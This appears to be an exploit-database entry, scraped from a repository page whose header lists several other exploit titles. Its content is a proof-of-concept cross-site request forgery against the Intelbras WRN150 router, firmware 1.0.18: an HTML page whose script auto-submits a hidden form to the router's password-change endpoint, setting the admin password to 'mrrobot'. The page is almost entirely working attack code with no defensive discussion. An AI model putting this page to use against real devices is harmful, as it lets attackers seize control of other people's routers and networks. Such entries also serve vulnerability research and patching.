d4a236d578
9 changes to exploits/shellcodes WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path ChaosPro 2.0 - Buffer Overflow (SEH) Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection Part-DB 0.4 - Authentication Bypass waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection PHP-FPM + Nginx - Remote Code Execution
26 lines
No EOL
895 B
Text
26 lines
No EOL
895 B
Text
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
|
|
Date: 2019-10-25
|
|
Exploit Author: Prof. Joas Antonio
|
|
Vendor Homepage: https://www.intelbras.com/pt-br/
|
|
Software Link: http://en.intelbras.com.br/node/25896
|
|
Version: 1.0.18
|
|
Tested on: Windows
|
|
CVE : N/A
|
|
|
|
####################
|
|
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
|
|
<input type="hidden" name="GO" value="system_password.asp">
|
|
<input type="hidden" name="SYSPSC" value="0">
|
|
<input class="text" type="password" name="SYSOPS" value="hack123"/>
|
|
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
|
|
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |